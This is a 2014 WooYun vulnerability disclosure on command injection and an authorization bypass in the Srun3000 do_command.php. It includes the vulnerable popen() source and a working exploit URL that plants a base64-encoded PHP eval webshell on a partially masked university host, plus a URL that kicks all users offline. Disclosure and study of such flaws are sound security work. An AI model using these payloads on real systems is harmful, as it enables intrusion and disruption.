当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062252

漏洞标题:Srun3000一处越权&命令执行&getshell(实例中影响几万师生数据告急)

相关厂商:srun.com

漏洞作者: HackPanda

提交时间:2014-05-25 17:24

修复时间:2014-08-23 17:26

公开时间:2014-08-23 17:26

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-25: 细节已通知厂商并且等待厂商处理中
2014-05-28: 厂商已经确认,细节仅向厂商公开
2014-05-31: 细节向第三方安全合作伙伴开放
2014-07-22: 细节向核心白帽子及相关领域专家公开
2014-08-01: 细节向普通白帽子公开
2014-08-11: 细节向实习白帽子公开
2014-08-23: 细节向公众公开

简要描述:

深澜一处命令执行 越权 之前没实例不给通过现在附一个 河北某大学的

详细说明:

先看源码,简单粗暴命令执行,但是没给审核,于是就有了后文

switch ( $_GET['action'] )
{
case "drop_user" :
if ( $_GET['ipv'] == "ipv4" )
{
if ( $_GET['uname1'] == "-all" )
{
$pfd = popen( "/srun3/bin/online_user -4 -d ".$_GET['uname1'], "r" ); //命令执行
}
else
{
$pfd = popen( "/srun3/bin/online_user -4 -D ".$_GET['uname1'], "r" );
udp_send( $_GET['ip'], 10333, "0&您已被强制断线" );
}
} }
}


漏洞证明:

实例中srun3000部署在内网。于是通过dmz一台主机代理访问测试。
根据源码
http://202.206.x.x/do_command.php?action=drop_user&ipv=ipv4&uname1=1|echo "<?php file_put_contents(base64_decode(L3NydW4zL3dlYi9taWMucGhw'),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydtaWMnXSk7Pz4='));?>">/srun3/web/1.php 写上去1.php 访问生成mic.php 密码mic (已删除)

web.png


还有越权 可以踢掉所有人。
http://202.206.x.x/do_command.php?action=drop_user&ipv=ipv4&uname1=-all

.png


影响数据

.png


ps:这句话一会可以删掉:后面还有几个命令执行的地方每个都需要这样写实例吗?麻烦狗哥了。
注:经测试
action=drop_user1、action=dm_drop_user&sid=、action=rad_drop_user&uname1=、action=rad_drop_user1&uname1=、action=disable_user&uname1=
等 都存在命令执行漏洞 请官方自查

修复方案:

过滤命令执行的地方。

版权声明:转载请注明来源 HackPanda@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-05-28 16:35

厂商回复:

该漏洞为用户自服务漏洞出现在版本14.12,在14.17.5版本中修正。非常感谢

最新状态:

暂无


漏洞评价:

评论

  1. 2014-05-25 17:25 | 浅蓝 ( 普通白帽子 | Rank:274 漏洞数:109 | 爱安全:www.ixsec.orgXsec社区:zone.ixse...)

    @疯狗 http://www.wooyun.org/bugs/wooyun-2014-062238/trace/64617e7cad84e5bf97e50f828e5549c4http://www.wooyun.org/bugs/wooyun-2014-062244/trace/70e66f405802ecc68fa36dd26b4671c9 狗哥,求审核

  2. 2014-05-25 19:08 | ′ 雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)

    哥们 能给份这个源码吗, 找了好久都没找到,

  3. 2014-05-25 19:11 | he2des ( 普通白帽子 | Rank:170 漏洞数:31 | )

    @′ 雨。 这好像是Linux安装环境~百度有的啊。

  4. 2014-05-26 14:36 | HackPanda ( 普通白帽子 | Rank:113 漏洞数:15 | Talk is cheap,show me the shell.)

    @疯狗 谢谢狗哥帮写注,辛苦了。